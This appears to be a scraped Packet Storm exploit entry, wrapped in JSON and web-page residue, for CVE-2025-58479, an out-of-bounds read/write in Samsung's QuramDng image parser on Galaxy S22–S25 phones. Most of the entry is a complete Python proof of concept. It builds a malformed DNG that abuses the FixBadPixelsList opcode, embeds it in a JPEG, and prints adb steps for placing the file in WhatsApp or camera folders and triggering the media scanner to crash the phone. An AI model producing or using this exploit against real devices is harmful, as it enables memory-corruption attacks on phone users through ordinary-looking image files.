{“lastseen”:”2026-02-09T16:19:24″,”description”:”This proof of concept demonstrates an out-of-bounds read \/ write vulnerability in Samsung’s QuramDng image parser, affecting Galaxy S22\u2013S25 devices running One UI 6+. By crafting a malformed DNG that abuses the OpcodeList1 specifically the…”,”published”:”2026-02-09T00:00:00″,”modified”:”2026-02-09T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Samsung QuramDng Embedded DNG Out-Of-Bounds Read \/ Write”,”source”:””,”references”:””,”id”:”PACKETSTORM:215150″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-58479″],”sourceData”:”=============================================================================================================================================\\n | # Title : Samsung QuramDng via Malicious DNG Embedded in JPEG Out-of-Bounds Read\/Write |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.1 (64 bits) |\\n | # Vendor : https:\/\/www.samsung.com\/us\/ |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/213367\/ \\u0026 CVE-2025-58479\\n \\n [+] Summary : This proof-of-concept demonstrates an out-of-bounds read\/write vulnerability in Samsung\u2019s QuramDng image parser, affecting Galaxy S22\u2013S25 devices running One UI 6+. \\n By crafting a malformed DNG that abuses the OpcodeList1 (specifically the FixBadPixelsList opcode) and embedding it inside a JPEG container, the parser processes invalid pixel coordinates without proper bounds checking. \\n When handled by system components such as com.samsung.ipservice, Media Scanner, or Samsung Gallery, the malformed metadata can trigger memory corruption and result in a crash (SIGSEGV) within libimagecodec.quram.so.\\n \\n [+] POC :\\n \\n #!\/usr\/bin\/env python3\\n \\n import struct\\n import sys\\n import os\\n \\n def create_malicious_dng():\\n \\n dng_data = bytearray()\\n dng_data.extend(b’II\\\\x2A\\\\x00′) \\n dng_data.extend(struct.pack(‘\\u003cI’, 8)) \\n ifd0_offset = len(dng_data)\\n dng_data.extend(struct.pack(‘\\u003cH’, 5)) \\n dng_data.extend(struct.pack(‘\\u003cH’, 256)) \\n dng_data.extend(struct.pack(‘\\u003cH’, 4)) \\n dng_data.extend(struct.pack(‘\\u003cI’, 1)) \\n dng_data.extend(struct.pack(‘\\u003cI’, 1024)) \\n dng_data.extend(struct.pack(‘\\u003cH’, 257)) \\n dng_data.extend(struct.pack(‘\\u003cH’, 4)) \\n dng_data.extend(struct.pack(‘\\u003cI’, 1)) \\n dng_data.extend(struct.pack(‘\\u003cI’, 32)) \\n dng_data.extend(struct.pack(‘\\u003cH’, 322)) \\n dng_data.extend(struct.pack(‘\\u003cH’, 4)) \\n dng_data.extend(struct.pack(‘\\u003cI’, 1)) \\n dng_data.extend(struct.pack(‘\\u003cI’, 1024))\\n dng_data.extend(struct.pack(‘\\u003cH’, 323)) \\n dng_data.extend(struct.pack(‘\\u003cH’, 4)) \\n dng_data.extend(struct.pack(‘\\u003cI’, 1)) \\n dng_data.extend(struct.pack(‘\\u003cI’, 32)) \\n dng_data.extend(struct.pack(‘\\u003cH’, 51008)) \\n dng_data.extend(struct.pack(‘\\u003cH’, 1)) \\n dng_data.extend(struct.pack(‘\\u003cI’, 100)) \\n opcode_offset = len(dng_data) + 4\\n dng_data.extend(struct.pack(‘\\u003cI’, opcode_offset))\\n dng_data.extend(struct.pack(‘\\u003cI’, 0))\\n dng_data.extend(struct.pack(‘\\u003cI’, opcode_offset)) \\n opcode_data = bytearray()\\n opcode_data.extend(struct.pack(‘\\u003cH’, 1)) \\n opcode_data.extend(struct.pack(‘\\u003cH’, 36)) \\n opcode_data.extend(struct.pack(‘\\u003cI’, 0x00030001)) \\n opcode_data.extend(struct.pack(‘\\u003cI’, 0x41414141))\\n opcode_data.extend(struct.pack(‘\\u003cB’, 0))\\n opcode_data.extend(struct.pack(‘\\u003cH’, 1))\\n opcode_data.extend(struct.pack(‘\\u003cH’, 1))\\n opcode_data.extend(struct.pack(‘\\u003cH’, 32)) \\n opcode_data.extend(struct.pack(‘\\u003cH’, 0)) \\n opcode_data.extend(struct.pack(‘\\u003cH’, 0)) \\n opcode_data.extend(struct.pack(‘\\u003cH’, 0)) \\n opcode_data.extend(struct.pack(‘\\u003cH’, 1)) \\n opcode_data.extend(struct.pack(‘\\u003cH’, 1)) \\n \\n while len(opcode_data) \\u003c 36:\\n opcode_data.extend(b’\\\\x00′)\\n \\n dng_data.extend(opcode_data)\\n \\n image_data_offset = len(dng_data)\\n dng_data.extend(b’\\\\x00′ * 1024 * 32 * 2) # Minimal raw image data\\n \\n return bytes(dng_data)\\n \\n def create_poc_jpeg_wrapper():\\n \\n \\n jpeg_data = bytearray()\\n \\n jpeg_data.extend(b’\\\\xFF\\\\xD8\\\\xFF\\\\xE0′) \\n jpeg_data.extend(b’\\\\x00\\\\x10′) \\n jpeg_data.extend(b’JFIF\\\\x00\\\\x01\\\\x02\\\\x00\\\\x00\\\\x64\\\\x00\\\\x64\\\\x00\\\\x00′)\\n \\n jpeg_data.extend(b’\\\\xFF\\\\xFE’) \\n comment = b\\”Malicious DNG for CVE-2025-58479\\”\\n jpeg_data.extend(struct.pack(‘\\u003eH’, len(comment) + 2))\\n jpeg_data.extend(comment)\\n \\n dng_data = create_malicious_dng()\\n jpeg_data.extend(b’\\\\xFF\\\\xED’) \\n jpeg_data.extend(struct.pack(‘\\u003eH’, len(dng_data) + 2))\\n jpeg_data.extend(dng_data)\\n \\n jpeg_data.extend(b’\\\\xFF\\\\xDB’) \\n jpeg_data.extend(b’\\\\x00\\\\x43\\\\x00\\\\x03\\\\x02\\\\x02\\\\x02\\\\x02\\\\x02\\\\x03\\\\x02\\\\x02\\\\x02\\\\x03\\\\x03\\\\x03\\\\x03\\\\x04\\\\x06\\\\x04\\\\x04\\\\x04\\\\x04\\\\x04\\\\x08\\\\x06\\\\x06\\\\x05\\\\x06\\\\x09\\\\x08\\\\x0A\\\\x0A\\\\x09\\\\x08\\\\x09\\\\x09\\\\x0A\\\\x0C\\\\x0F\\\\x0C\\\\x0A\\\\x0B\\\\x0E\\\\x0B\\\\x09\\\\x09\\\\x0D\\\\x11\\\\x0D\\\\x0E\\\\x0F\\\\x10\\\\x10\\\\x11\\\\x10\\\\x0A\\\\x0C\\\\x12\\\\x13\\\\x12\\\\x10\\\\x13\\\\x0F\\\\x10\\\\x10\\\\x10\\\\x01′)\\n \\n jpeg_data.extend(b’\\\\xFF\\\\xC0′) \\n jpeg_data.extend(b’\\\\x00\\\\x0B\\\\x08\\\\x00\\\\x01\\\\x00\\\\x01\\\\x03\\\\x01\\\\x22\\\\x00\\\\x02\\\\x11\\\\x01\\\\x03\\\\x11\\\\x01′)\\n jpeg_data.extend(b’\\\\xFF\\\\xC4′) \\n jpeg_data.extend(b’\\\\x00\\\\x1F\\\\x00\\\\x00\\\\x01\\\\x05\\\\x01\\\\x01\\\\x01\\\\x01\\\\x01\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\x09\\\\x0A\\\\x0B’)\\n jpeg_data.extend(b’\\\\x00\\\\x0C\\\\x03\\\\x01\\\\x00\\\\x02\\\\x11\\\\x03\\\\x11\\\\x00\\\\x3F\\\\x00′)\\n jpeg_data.extend(b’\\\\x00′)\\n jpeg_data.extend(b’\\\\xFF\\\\xD9′)\\n \\n return bytes(jpeg_data)\\n \\n def main():\\n print(\\”[*] Creating PoC for CVE-2025-58479 – Samsung QuramDng OOB Vulnerability\\”)\\n print(\\”[*] Affected: Samsung Galaxy S22-S25 with One UI 6+\\”)\\n \\n poc_data = create_poc_jpeg_wrapper()\\n \\n filename = \\”poc_cve_2025_58479.jpeg\\”\\n with open(filename, \\”wb\\”) as f:\\n f.write(poc_data)\\n \\n print(f\\”[+] Created malicious file: {filename}\\”)\\n print(f\\”[+] File size: {len(poc_data)} bytes\\”)\\n \\n print(\\”\\\\n[*] To test on device:\\”)\\n print(f\\” adb push {filename} \/storage\/emulated\/0\/Android\/media\/com.whatsapp\/WhatsApp\/Media\/WhatsApp\\\\\\\\ Images\/\\”)\\n print(f\\” adb shell am broadcast -a android.intent.action.MEDIA_SCANNER_SCAN_FILE -d file:\/\/\/storage\/emulated\/0\/Android\/media\/com.whatsapp\/WhatsApp\/Media\/WhatsApp%20Images\/{filename}\\”)\\n print(\\”\\\\n[*] Wait ~5 minutes for com.samsung.ipservice to process the file\\”)\\n print(\\”[*] Expected: Crash in libimagecodec.quram.so with SIGSEGV\\”)\\n \\n print(\\”\\\\n[*] Alternative test with Gallery:\\”)\\n print(f\\” adb push {filename} \/storage\/emulated\/0\/DCIM\/Camera\/\\”)\\n print(f\\” adb shell am broadcast -a android.intent.action.MEDIA_SCANNER_SCAN_FILE -d file:\/\/\/storage\/emulated\/0\/DCIM\/Camera\/{filename}\\”)\\n print(\\”\\\\n[*] Open Samsung Gallery to trigger decode\\”)\\n \\n if __name__ == \\”__main__\\”:\\n main()\\n \\n Greetings to :============================================================\\n jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|\\n ==========================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/215150″,”cvss”:{“score”:7.5,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:N\/A:N”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/215150\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-02-09T16:19:24″,”description”:”This proof of concept demonstrates an out-of-bounds read \/ write vulnerability in Samsung’s QuramDng image parser, affecting Galaxy S22\u2013S25 devices running One UI 6+. By…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,16,12,15,13,53,7,11,5],"class_list":["post-39820","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-75","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n